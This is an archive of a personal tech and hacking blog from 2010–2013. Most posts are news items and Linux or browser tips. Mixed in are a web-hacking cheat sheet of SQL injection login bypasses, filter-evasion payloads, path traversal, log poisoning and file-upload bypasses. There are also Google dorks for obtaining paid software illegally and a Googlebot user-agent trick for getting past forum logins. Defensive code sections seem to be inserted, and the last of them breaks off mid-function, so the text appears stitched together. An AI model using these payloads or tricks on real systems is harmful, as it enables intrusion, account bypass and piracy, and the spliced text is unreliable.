Showing posts with label internet.
Friday, 11 January 2013
Java 0-day In The Wild - Disable Java Plugin NOW
Security researchers have discovered yet another critical Java 0-day exploit, which is being used by the majority of the browser exploit packs such as Blackhole and Cool. Users are urged to DISABLE the Java plugin RIGHT NOW.
French researcher Kaffeine reported in a blog post that the Java 0-day has been spotted making big hits daily. This particular exploit has proven to be a very serious threat to users. The folks at AlienVault Labs have also reproduced the exploit, and it seems to work on all Java versions across all platforms.
For now, users are strongly urged to disable their Java plugins so that they do not get hit by these 0-days.
So what are you waiting for?
Important links:
How To Disable Java Plugin
Kaffeine's blog post
Alien Vault Labs Post
2013-01-11T20:33:00+05:45
Cool Samar
Labels:
hacking,
internet,
news,
security,
web
Thursday, 27 December 2012
The Scale Of Universe [A Must Watch]
Well, this is so absofuckingly awesome that I decided it is worth making a post about this particular site.
Without further delay, I present you this awesome link
Scale of Universe
I hope you loved the site like I did :)
Labels:
internet,
useful website,
web
Wednesday, 12 December 2012
GitHub Snippet Sharing Gist Gets Revamped
The GitHub team today announced the new Gist, their online snippet sharing tool. Gist is a simple way to share snippets and pastes with others, offering syntax support for several languages, configuration file formats and document formats.
The great thing about Gist is that all gists are git repositories, so they are automatically versioned, forkable and usable as a git repository. Whether it's a simple snippet or a full app, Gist is a great way to get your point across.
The new Gist has been rewritten completely from scratch using better libraries and following an appropriate style guide.
Read rest of the story at GitHub
2012-12-12T20:18:00+05:45
Cool Samar
Labels:
github,
internet,
news,
programming
Tuesday, 11 December 2012
Inj3ct0r Team Hacked ExploitHub, Stole Private Exploits Worth $242333
Inj3ct0r team, which provides the ultimate database of exploits and vulnerabilities and serves as a great resource for vulnerability researchers and security professionals, has hacked ExploitHub.com, a site similar to Inj3ct0r, and stolen several private exploits worth $242333.
In their post, the Inj3ct0r team gave details of the motivation for the hack and the process they followed. At the time of writing this, ExploitHub.com seems to be down.
The post gives the process used to accomplish the hack as below:
I am very much surprised when he learned of Magento eCommerce Software and search /install/
1) We scan server and site
2) We reinstall Magento CMS https://www.exploithub.com/install/ <= We reinstall Magento CMS
3) Upload shell and phpinfo https://www.exploithub.com/phpinfo.php
4) Back all files and database.
5) Upload piece of the database https://www.exploithub.com/export/
6) Increased privileges
2012-12-11T23:18:00+05:45
Cool Samar
Labels:
hacking,
internet,
news,
security
Monday, 5 November 2012
ImageShack and Symantec Hacked And Dumped
2012 has been a year of leaks and hacks and continues to be so. Hackers broke into ImageShack and Symantec servers and leaked critical information about the servers and employees.
Hackers have disclosed in an e-zine that the security practices of these major companies have been a joke: in the case of ImageShack, all MySQL instances running as root, really old (2008) kernels, hardcoded database passwords, register_globals enabled, etc.
The e-zine says:
ImageShack has been completely owned, from the ground up. We have had root and physical control of every server and router they own.
Likewise, they have dumped the database of Symantec, one of the leading AV companies, which includes critical information about the researchers at Symantec.
Links
Pastebin
AnonPaste
2012-11-05T09:06:00+05:45
Cool Samar
Labels:
hacking,
internet,
news
Thursday, 30 August 2012
How To Automatically Start Firefox In Private Browsing Mode
In this post, I will provide instructions for a few methods to automatically start Firefox in private browsing mode.
Method 1
Go to Edit -> Preferences and then select the Privacy tab. From the History dropdown list ("Firefox will:"), choose Use custom settings for history and then check the Always use the private browsing mode option.
Method 2
The second method involves changing the Firefox configuration, which can be accessed by typing about:config in the address bar. The first method described above essentially changes one particular preference, browser.privatebrowsing.autostart, in the background; this second method does that background job manually.
Once you open the about:config configuration page, search for private and, from the resulting list, change the boolean value of browser.privatebrowsing.autostart to true by double-clicking on it.
I hope this helps. If you have any other method, please drop it as a comment. :)
2012-08-30T01:03:00+05:45
Cool Samar
Labels:
internet,
mozilla firefox,
tricks and tips,
web
Monday, 27 August 2012
How To Manually Install Flash Player 11 In Linux
This post provides step-by-step instructions for installing the Flash Player 11 plugin on Ubuntu 11.04 and other versions and distros. It will be helpful for everybody who is having trouble with the software center like I had.
Make sure no Firefox process is running, then fire up the terminal and type the following commands in order:
mkdir -p ~/flash && cd ~/flash
wget http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.238.orig.tar.gz
tar -zxvf adobe-flashplugin_11.2.202.238.orig.tar.gz
sudo cp -r libflashplayer.so /usr/lib/firefox/plugins
sudo cp -r usr/* /usr
Once you have finished copying the shared object and the other necessary files to their respective target directories, you can open Firefox and you're good to go. :)
2012-08-27T22:22:00+05:45
Cool Samar
Labels:
fedora,
internet,
linux,
mozilla firefox,
plugin,
tricks and tips,
ubuntu,
ubuntu 11.10,
web
Sunday, 10 June 2012
How Does Windows 7 Determine Internet Access Status
So I was curious about how Microsoft manages to determine the status of internet access. I am a Linux user and I have been thinking of having something similar to Windows in Ubuntu as well. Out of curiosity, I was tempted to dig further into this, and here is my finding.
What tool would be better than Wireshark for analyzing network traffic? So I fired up Wireshark on my friend's laptop. I took out the ethernet cable, started the capture on the ethernet interface, and then plugged the ethernet cable back in. I waited till the internet access status was shown at the bottom right (the right part of the taskbar) and stopped the live capture.
Now to the fun part: I analyzed the capture with my noob skill.
One particular entry was the DNS query for . Curious, I opened the site to find a 403 Forbidden error. I was now starting to think that Microsoft does the DNS lookup for this particular site and if it fails, Windows shows the No Internet Access sign.
Wait!!! There's something more. Further analysis showed that a GET request is made for the file ncsi.txt on that website. Following the stream, I found out that the page contained the text Microsoft NCSI.
So this is what I concluded after this analysis:
Windows performs a DNS lookup for www.msftncsi.com; then, after it succeeds, a request is made to http://msftncsi.com/ncsi.txt, which should contain the text Microsoft NCSI.
I did a Google search on Microsoft NCSI and THIS PAGE gives a detailed description of NCSI, which stands for Network Connectivity Status Indicator.
If you guys have researched this and found something different, please let us know by throwing in a comment.
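The two-step check concluded above can be reproduced on Linux. This is an added example, not part of the original post and not Microsoft's code: the function names and the four status strings are made up for illustration, while the host, URL and expected text are the ones given in the conclusion. It goes one step beyond the post by also reporting the case where the HTTP answer comes back with different content, which is what a captive portal or an intercepting proxy produces.

```python
import socket
import urllib.request

# Values taken from the conclusion of the post.
NCSI_HOST = "www.msftncsi.com"
NCSI_URL = "http://msftncsi.com/ncsi.txt"
NCSI_BODY = "Microsoft NCSI"


def system_resolve(host):
    """Resolve a host name with the system resolver (raises OSError on failure)."""
    return socket.gethostbyname(host)


def system_fetch(url, timeout=5):
    """Fetch a URL and return (status code, first bytes of the body as text)."""
    with urllib.request.urlopen(url, timeout=timeout) as response:
        return response.status, response.read(256).decode("ascii", "replace")


def connectivity_status(resolve=system_resolve, fetch=system_fetch):
    """Classify connectivity the way the captured probe suggests.

    resolve and fetch are parameters so the logic can be exercised without
    a network; by default the real resolver and HTTP client are used.
    """
    # Step 1: the DNS lookup. socket.gaierror is a subclass of OSError.
    try:
        resolve(NCSI_HOST)
    except OSError:
        return "no-dns"

    # Step 2: the plain-HTTP GET. urllib's URLError/HTTPError are OSErrors too.
    try:
        status, body = fetch(NCSI_URL)
    except OSError:
        return "no-http"

    # Step 3: compare the content. A login page served in place of the file
    # still arrives with status 200, so the body has to be checked as well.
    if status == 200 and body.strip() == NCSI_BODY:
        return "internet"
    return "intercepted"


if __name__ == "__main__":
    print(connectivity_status())
```

The probe is unauthenticated plain HTTP, so anyone on the path can answer it; treat the result as a hint about the network, not as proof of who you are talking to.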
2012-06-10T01:37:00+05:45
Cool Samar
Labels:
internet,
windows
Friday, 1 June 2012
100% Internet Explorer 6 Clone In HTML5
Well, I came across this website via some referral online and thought of sharing it with you guys. A funny 100% IE6 clone done in HTML5 that MAKES sense :D.
IE6 Clone in HTML5
2012-06-01T21:13:00+05:45
Cool Samar
Labels:
computer funny pictures,
fun,
internet
Tuesday, 22 May 2012
Setting Up Ncell Connect In Linux
Today I got an Ncell Connect device from my junior friend and did a quick PPP setup on Linux. Later I thought that this would be useful for others who use Ubuntu (that's what I'm using) and other distros, and hence I am posting the steps for setting up Ncell Connect in Linux.
1. Install wvdial. Wvdial is a dialer that lets you make a PPP connection in order to connect to the internet. Fire up the terminal and run the following command:
samar@Techgaun:~$ sudo apt-get install wvdial
Optionally, you could also install gnome-ppp (sudo apt-get install gnome-ppp) for a GUI, but wvdial does the whole job.
2. Edit /etc/wvdial.conf, the configuration file for wvdial, which requires appropriate settings for Ncell Connect, and replace all the text with the following data.
[Dialer Defaults]
Stupid Mode = 1
Modem Type = Analog Modem
ISDN = 0
Phone = *99#
Modem = /dev/ttyUSB0
Username = web
Dial Command = ATDT
Password = web
Baud = 460800
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
During the above step, you can run the wvdialconf command to check whether your Huawei card is being detected. The Modem = line may need a different value on your system.
3. While your device is plugged in, type the following command and note the line containing Huawei.
samar@Techgaun:~$ lsusb
Bus 002 Device 005: ID 12d1:1446 Huawei Technologies Co., Ltd. E1552 (HSPA modem)
Bus 002 Device 004: ID 0408:03f1 Quanta Computer, Inc.
Bus 002 Device 003: ID 138a:0005 DigitalPersona, Inc
Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 025: ID 04f3:0210 Elan Microelectronics Corp. AM-400 Hama Optical Mouse
Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
We are concerned with the vendor and product IDs. In the above output, 12d1 is the vendor ID and 1446 is the product ID. Now run the following in the terminal:
samar@Techgaun:~$ sudo modprobe usbserial vendor=0x12d1 product=0x1446
4. Now we should be all good. All we have to do is dial the connection. Type the following in the terminal:
samar@Techgaun:~$ sudo wvdial
If everything is fine, your connection will succeed, showing information such as the IP address and the primary and secondary DNS servers. I hope this helps. Enjoy Ncell Connect in Linux :)
2012-05-22T14:28:00+05:45
Cool Samar
Labels:
internet,
linux,
ncell connect,
ubuntu
Thursday, 29 March 2012
Extracting All Hyperlinks From Webpages - Python
In this example, I am going to show how easily you can extract all the links in a webpage using Python. If you are learning to write a small-scale crawler, this can be a quick start on how to extract the links from any webpage.
Basically, we will send an HTTP request to a webpage and read the HTML response, except when the connection cannot be established. In that case, we will simply inform the user that we could not connect to the website.
For all of this, we will import a few modules; the most important ones are re and urllib2, for regular expressions and HTTP request/response handling respectively.
We then write the regex for hyperlinks, which we will search for in the HTML data we get back from the server after sending the request. Note the <a href=[\'"]?([^\'" >]+). The parentheses are there to let us capture the information we need, i.e. the actual links.
Now that you understand what we'll be doing, below is the Python script to extract the hyperlinks from any webpage.
#!/usr/bin/python
import re, urllib2
from sys import argv

# Take the URL from the command line, or fall back to a default
if (len(argv) != 2):
    print "No URL specified. Taking default URL for link extraction"
    url = "http://www.techgaun.com"
else:
    url = str(argv[1])

# The group in parentheses captures the value of the href attribute
links_regex = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)
url_request = urllib2.Request(url)
try:
    response = urllib2.urlopen(url_request)
    html = response.read()
    links = links_regex.findall(html)
    print '\n'.join(links)
except urllib2.URLError:
    print "Can't Connect to the website"
Now run the script as python extracter.py http://www.techgaun.com or any URL you wish to.
So isn't it a good start for writing your own simple web crawler? :P
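The regex above only matches when href is the first attribute, exactly one space after <a, and it returns the raw attribute value, including javascript: and mailto: targets and anchors inside HTML comments. The following is an added example in Python 3, not the original script: it uses the standard library's html.parser and urllib.parse to collect anchors regardless of attribute order, resolve them against the page URL and keep only http/https links, which is what a crawler should follow. The sample HTML and the base URL are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlsplit

# The regex from the post, kept for comparison.
POST_REGEX = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)

# Constructed sample page.
SAMPLE_HTML = """
<a href="/about">About</a>
<a class="nav" href="http://www.techgaun.com/2012/03/post.html#comments">Post</a>
<A HREF='contact.html'>Contact</A>
<a href="javascript:void(0)">Menu</a>
<a href="mailto:someone@example.com">Mail</a>
<!-- <a href="/hidden">commented out</a> -->
<a  href="/about">About again</a>
"""
SAMPLE_BASE = "http://www.techgaun.com/2012/03/index.html"


class AnchorCollector(HTMLParser):
    """Collect the href value of every <a> tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lower-cased; comments never get here.
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value.strip())


def extract_links(html, base_url):
    """Return absolute, de-duplicated http/https links in document order."""
    collector = AnchorCollector()
    collector.feed(html)
    links = []
    for href in collector.hrefs:
        absolute = urldefrag(urljoin(base_url, href)).url  # resolve, drop #fragment
        if urlsplit(absolute).scheme not in ("http", "https"):
            continue  # javascript:, mailto:, data: and friends are not crawlable
        if absolute not in links:
            links.append(absolute)
    return links


def regex_links(html):
    """What the post's regex returns for the same input."""
    return POST_REGEX.findall(html)


if __name__ == "__main__":
    print("regex :", regex_links(SAMPLE_HTML))
    print("parser:", extract_links(SAMPLE_HTML, SAMPLE_BASE))
```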
2012-03-29T18:19:00+05:45
Cool Samar
Labels:
internet,
programming,
python,
web
Sunday, 12 February 2012
Determine All Internet Connections And Corresponding Running Processes In Linux [How To]
Sometimes you might want to see all the internet connections being made by the running processes on a Linux system. I am writing up this small command-line trick to view all the internet connections using the lsof command.
The lsof command is used to list all the open files and the processes that opened those files. All kinds of resources such as disks, network connections, pipes, etc. are actually implemented as files in Linux, and the lsof command lets you get a report on the opened files.
To view all the internet connections and the corresponding processes, we can simply use the -i switch as below:
samar@Techgaun:~$ lsof -i
The above command runs fine but is a little slow, since it tries to resolve network addresses to host names and port numbers to port names. So you might wish to use the command below for a faster response from lsof.
samar@Techgaun:~$ lsof -i -Pn
Also, running the lsof command as root (i.e. sudo lsof | grep -i listen or sudo lsof -i | grep -i listen) will give extra output, especially the "LISTEN" entries, i.e. the processes that are listening for incoming connections. This piece of information might be useful in detecting backdoors and rootkits, but I've not yet explored that.
I hope this little trick comes in useful sometime.
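To act on the LISTEN entries mentioned above, the output of lsof -i -Pn can be compared against the services you expect on the machine. This is an added example, not part of the original post: the sample output, the allow-list and the function names are constructed for illustration.

```python
import subprocess

# Constructed sample of `sudo lsof -i -Pn` output.
SAMPLE_LSOF = """\
COMMAND   PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812  root    3u  IPv4  12345      0t0  TCP *:22 (LISTEN)
mysqld    900 mysql   10u  IPv4  22222      0t0  TCP 127.0.0.1:3306 (LISTEN)
cupsd     640  root    7u  IPv6  13000      0t0  TCP [::1]:631 (LISTEN)
dhclient  700  root    6u  IPv4  11111      0t0  UDP *:68
firefox  2101 samar   55u  IPv4  45678      0t0  TCP 192.168.1.5:51514->93.184.216.34:443 (ESTABLISHED)
nc       3333 samar    3u  IPv4  55555      0t0  TCP *:31337 (LISTEN)
"""

# Hypothetical allow-list: (command, port) pairs expected on this host.
EXPECTED = {("sshd", 22), ("mysqld", 3306), ("cupsd", 631)}

# Addresses that mean "reachable on every interface".
WILDCARDS = {"*", "0.0.0.0", "[::]"}


def read_lsof():
    """Run the command from the post and return its output (needs lsof installed)."""
    result = subprocess.run(["lsof", "-i", "-Pn"], capture_output=True, text=True)
    return result.stdout


def parse_listeners(text):
    """Return one dict per TCP socket in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        # A LISTEN row has 10 columns: ... NODE NAME (STATE)
        if len(parts) < 10 or parts[7] != "TCP" or parts[9] != "(LISTEN)":
            continue
        host, _, port = parts[8].rpartition(":")
        if not port.isdigit():
            continue  # port names appear when -P was not given
        listeners.append({
            "command": parts[0],
            "pid": int(parts[1]),
            "user": parts[2],
            "host": host,
            "port": int(port),
            "exposed": host in WILDCARDS,  # bound to all interfaces
        })
    return listeners


def unexpected_listeners(listeners, expected=EXPECTED):
    """Listeners whose (command, port) pair is not on the allow-list."""
    return [l for l in listeners if (l["command"], l["port"]) not in expected]


if __name__ == "__main__":
    for item in unexpected_listeners(parse_listeners(SAMPLE_LSOF)):
        scope = "all interfaces" if item["exposed"] else item["host"]
        print("unexpected: %(command)s pid=%(pid)d user=%(user)s" % item,
              "port", item["port"], "on", scope)
```

Swap SAMPLE_LSOF for read_lsof() to check the live system, and run it as root so that sockets owned by other users are included.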
2012-02-12T20:10:00+05:45
Cool Samar
Labels:
internet,
linux,
lsof,
security,
tricks and tips,
ubuntu,
ubuntu 11.10
Tuesday, 17 January 2012
Watch ASCII Star Wars Through Telnet
Just thought to share this cool link that features Star Wars over telnet. Telnet to the remote server and you'll be shown the Star Wars story.
Open your terminal and type the following:
telnet towel.blinkenlights.nl
And the online web version is available HERE
2012-01-17T11:47:00+05:45
Cool Samar
Labels:
fun,
internet,
web
Saturday, 26 February 2011
How to get things for free in internet [Google dorks]
Well, it's been a few days since I last posted. Today I have come up with an interesting post that will help you get things for free on the internet. Of course, it is not legal, and it works in many cases but not always. And many of the results might be crap.
Following is a list of Google dorks that will help you get some commercial software for free. Google dorks are keyword phrases that can be searched with the Google search engine.
intitle:"Thank You For Your Order" intext:Click Here to Download
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html
The above dorks are just examples. You can modify them and experiment on your own to search specific domains, etc. I hope this is useful. Thanks :)
2011-02-26T20:15:00+05:45
Cool Samar
Labels:
google hacking,
hacking,
internet,
software,
web
Thursday, 17 February 2011
Download.com.np : A nepali download portal
I came across this Nepali download portal, Download.com.np, which seems to be powered by MOS.
Mercantile Communications, a leading Kathmandu-based IT company, developed a useful website, download.com.np, for users who frequently require different kinds of freeware/shareware programs in their day-to-day professional life. Download.com.np aims to be a window onto a collection of different freeware and shareware programs, with easier and faster downloading from the local network.
Visit the site
Happy downloadings, Nepali users :)
2011-02-17T23:19:00+05:45
Cool Samar
Labels:
internet,
useful website,
web
Thursday, 10 February 2011
ieHTTPHeaders : An IE alternative for livehttpheaders add-on
Well, IE sucks, but if you still need to use it and require an HTTP header viewing add-on like livehttpheaders for Mozilla Firefox, there is a tool called ieHTTPHeaders that serves the same purpose.
I won't write much about it, just visit the official webpage for more information and download links:
Official webpage of ieHTTPheaders
Thanks.
2011-02-10T21:01:00+05:45
Cool Samar
Labels:
browser,
browser addons,
internet,
useful website,
web
Sunday, 26 December 2010
Web Hacking for Beginners and Intermediates
This is the article I posted for the secworm contest, and I am now posting it on my blog. It's not that well written due to the lack of time, but it will still help some of you out there.
Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any grammar mistakes in this article, as there will surely be lots of grammatical errors in it.
This article is not about teaching the basics of any web hacking technique. Instead, it is a document of tips and tricks that beginners and intermediates can make use of in order to attack web applications in certain scenarios. I assume that you know the basics of the web hacking techniques, or you could google to learn the basics. I'll be covering tricks for different web hacking methods such as SQL injection (MySQL, basically), insecure file inclusion, insecure file upload, etc. As already stated, the article won't be about the basics but rather will present a few useful tricks that might be useful in the course of web-app pentesting.
SQL Injection:
Comments: -- , /* , #
MySQL version: SELECT @@version
Current SQL User: SELECT user()
SELECT system_user()
Current Database: SELECT database()
MySQL Data directory(location of MySQL data files): SELECT @@datadir
List all MySQL users: SELECT host, user, password FROM mysql.user
Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char
Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.
Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
Quote bypassing does not seem to work here. The path can't be encoded using the quote or char tricks, so we can't bypass the quote in this case.
Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)
unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--
Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091
XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>
Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
Any of the above in the username field, with a random password, would bypass a vulnerable login.
' /*or*/ 1='1 -- Bypasses a filter on "or"
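From the defender's side, the "Bypassing filters" variants above show why keyword matching on raw input fails. The following is an added example, not code from the original post: the function names are hypothetical, the sample inputs are the strings listed above plus one constructed benign value, and the check is meant for logging and alerting, not as a replacement for prepared statements.

```php
<?php
// Added example (not the post's code): canonicalise a parameter value before
// signature matching. Function names are hypothetical.

function normalize_for_inspection(string $raw): string
{
    $s = rawurldecode($raw);                                      // %a0, %09 become raw bytes
    $s = (string) preg_replace('~/\*!\d*(.*?)\*/~s', ' $1 ', $s); // MySQL runs /*! ... */ bodies, so keep them
    $s = (string) preg_replace('~/\*.*?\*/~s', ' ', $s);          // plain comments act as whitespace
    $s = (string) preg_replace('/[\x00-\x20\xa0()]+/', ' ', $s);  // control bytes, 0xA0 and parentheses separate tokens
    return strtolower(trim($s));                                  // SQL keywords are case-insensitive
}

function looks_like_union_select(string $raw): bool
{
    $canon = normalize_for_inspection($raw);
    return preg_match('/\bunion (all |distinct )?select\b/', $canon) === 1;
}

// Inputs: the filter-evasion strings from the list above, then a constructed
// benign sentence that a naive "contains union and select" rule would flag.
$samples = [
    'uNiOn aLl SeLeCT 1,2 FrOm tbluser',
    '/*!union*/ all select 1,2 from tbluser',
    'union(select(null),table_name(from)(information_schema.tables))',
    '0%a0union%a0select%091',
    'the student union all selected a new chair',
];

foreach ($samples as $s) {
    printf("%-66s %s\n", $s, looks_like_union_select($s) ? 'ALERT' : 'ok');
}
```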
File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php
including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
Nullbyte injection
test.php?page=../../../../../etc/passwd
Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. You should also try including everything you can, such as session files, uploaded files, etc. For Apache log injection, you'll have to telnet in and send a GET request containing arbitrary PHP code, like Get /
A few Apache log locations to try are as below:
Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.
Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
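Every request shape in this section depends on the `page` parameter becoming part of a file path. The following added example (not the post's code) resolves the parameter through a fixed map instead; the page names, the `PAGES` constant, `resolve_page()` and the temporary directory are all hypothetical.

```php
<?php
// Added example (not the post's code): resolve ?page= through a fixed map.
// Page names and the temporary pages directory are constructed.

const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_page(string $requested, string $pagesDir): ?string
{
    // Only short lowercase identifiers pass. That alone drops "../", NUL
    // bytes, "php://" wrappers, dotfiles and "/." padding used for truncation.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    // The request selects a key; the file name comes from the server's map.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . PAGES[$requested]);
    // Defence in depth: after symlink resolution the file must sit under $base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory and the request shapes above.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';\n");

$requests = [
    'home', '.htaccess', '../../../../etc/passwd', "../etc/passwd\0",
    'php://filter/convert.base64-encode/resource=config.php',
    '../logs/access.log', '../../../proc/self/environ', 'about',
];
foreach ($requests as $r) {
    $file = resolve_page($r, $dir);
    printf("%-58s %s\n", json_encode($r, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : 'include ' . basename($file));
}
// In test.php the handler would be:
//   $f = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
//   if ($f === null) { http_response_code(404); exit; }
//   include $f;
unlink($dir . '/home.php');
rmdir($dir);
```

Setting `allow_url_include = Off` and an `open_basedir` restriction in php.ini limits the damage if an include of this kind is missed elsewhere in the code base.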
File upload:
Nullbyte injection: If only valid extensions (such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg, which will bypass the file upload security check.
PHP code within image: Sometimes uploads are not checked for the file extension but for the dimensions of the image. This again can be bypassed by injecting PHP code into a valid image and renaming it to a .php file. The tool named edjpgcom can be used to inject the PHP code as a JPEG comment in the image.
Header bypass: Sometimes the developer just relies on the header information that contains the type of the file, like "image/jpeg" for a JPEG image. But since this is passed from the client side, it can be modified using tools such as Tamper Data or Live HTTP Headers.
Also, the file upload feature can be exploited in combination with the file inclusion vulnerability. If you have a site vulnerable to file inclusion but not vulnerable to insecure file upload, you can upload a valid image as described in the second method here and then include that file with the file-inclusion-vulnerable PHP script.
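The three upload checks described above fail because they trust the client's file name, the client's Content-Type header, or the image dimensions alone. The following added example (not the post's code) shows a server-side handler core that trusts none of them; `store_image()`, `IMAGE_TYPES` and the marker string are hypothetical, and the fileinfo and GD extensions are assumed to be installed.

```php
<?php
// Added example (not the post's code); needs the fileinfo and GD extensions.
// A real handler first checks $_FILES['f']['error'] === UPLOAD_ERR_OK and
// is_uploaded_file(), then passes $_FILES['f']['tmp_name'] as $tmpPath.

const IMAGE_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_image(string $tmpPath, string $uploadDir): string
{
    // The type is read from the bytes. The client's Content-Type and file
    // name (shell.php.jpg) are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !array_key_exists($mime, IMAGE_TYPES)) {
        throw new RuntimeException('not an accepted image type');
    }
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        throw new RuntimeException('image does not decode');
    }
    // Server-chosen random name and extension; $uploadDir should be outside
    // the web root or served with script execution disabled.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . IMAGE_TYPES[$mime];
    // Re-encode from pixels: comment segments and trailing bytes are not copied.
    switch ($mime) {
        case 'image/jpeg': $ok = imagejpeg($img, $dest, 90); break;
        case 'image/png':  $ok = imagepng($img, $dest); break;
        default:           $ok = imagegif($img, $dest);
    }
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $dest;
}

// Constructed input: a 4x4 JPEG with an inert marker appended after the image data.
$src = tempnam(sys_get_temp_dir(), 'up');
imagejpeg(imagecreatetruecolor(4, 4), $src);
file_put_contents($src, 'CONSTRUCTED-MARKER', FILE_APPEND);
$out = store_image($src, sys_get_temp_dir());
printf("marker in upload: %s, in stored copy: %s\n",
    var_export(strpos(file_get_contents($src), 'CONSTRUCTED-MARKER') !== false, true),
    var_export(strpos(file_get_contents($out), 'CONSTRUCTED-MARKER') !== false, true));

// Constructed input: text renamed to look like an image is refused.
file_put_contents($src, "plain text, not an image\n");
try { store_image($src, sys_get_temp_dir()); } catch (RuntimeException $e) { echo $e->getMessage(), "\n"; }
unlink($src); unlink($out);
```

Re-encoding is a supporting control; what closes the upload-plus-inclusion path described above is the server-chosen extension, non-executable storage, and fixing the include itself.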
As said earlier, this article is not about giving you every step of how to exploit the web vulnerabilities.
2010-12-26T21:58:00+05:45
Cool Samar
Labels:
beginner,
file inclusion,
hacking,
internet,
remote code exection,
security,
security bypass,
sql injection,
web
Friday, 24 December 2010
Browsing the restricted forums without registering
Well, it has worked for me, and I am posting how you can browse restricted forums by misusing their SEO setup (I guess). A website's traffic depends hugely on Google search, and hence most websites allow the Google bot to crawl and index their pages so that they appear in search results. The Google bot user agent is therefore allowed to crawl any restricted forum so that those pages can be indexed.
The requirement is the User Agent Switcher add-on for Firefox, which can be downloaded from HERE. Install this add-on and restart the browser.
Now in the Firefox menu, under Tools, you will see a new option, Default User Agent, from where you can choose different user agents and add new ones. Among the available user agents, you will find the Google Bot 2.1 user agent under the Search Robots option. Choose Google Bot 2.1 as your default user agent and start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)
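For site owners, the trick above works only when the crawler exemption is keyed on the User-Agent header. The following added example (not part of the original post) grants the exemption only when reverse and forward DNS agree; `is_verified_googlebot()` is a hypothetical name, and the IP addresses and host names are constructed from documentation ranges so the cases run offline.

```php
<?php
// Added example (not the post's code): treat a request as Googlebot only if
// reverse and forward DNS agree. $ptr and $fwd are injectable so the
// constructed cases below run offline; in production pass 'gethostbyaddr'
// and 'gethostbynamel' (IPv4 only).

function is_verified_googlebot(string $ua, string $ip, callable $ptr, callable $fwd): bool
{
    if (stripos($ua, 'Googlebot') === false) {
        return false;                        // not claiming to be the crawler
    }
    $host = $ptr($ip);                       // gethostbyaddr() returns the IP itself on failure
    if (!is_string($host) || $host === $ip) {
        return false;
    }
    $host = strtolower(rtrim($host, '.'));
    if (!preg_match('/\.(googlebot|google)\.com\z/', $host)) {
        return false;                        // PTR is not in the crawler's domains
    }
    $addrs = $fwd($host);                    // forward-confirm: the name must map back to the same IP
    return is_array($addrs) && in_array($ip, $addrs, true);
}

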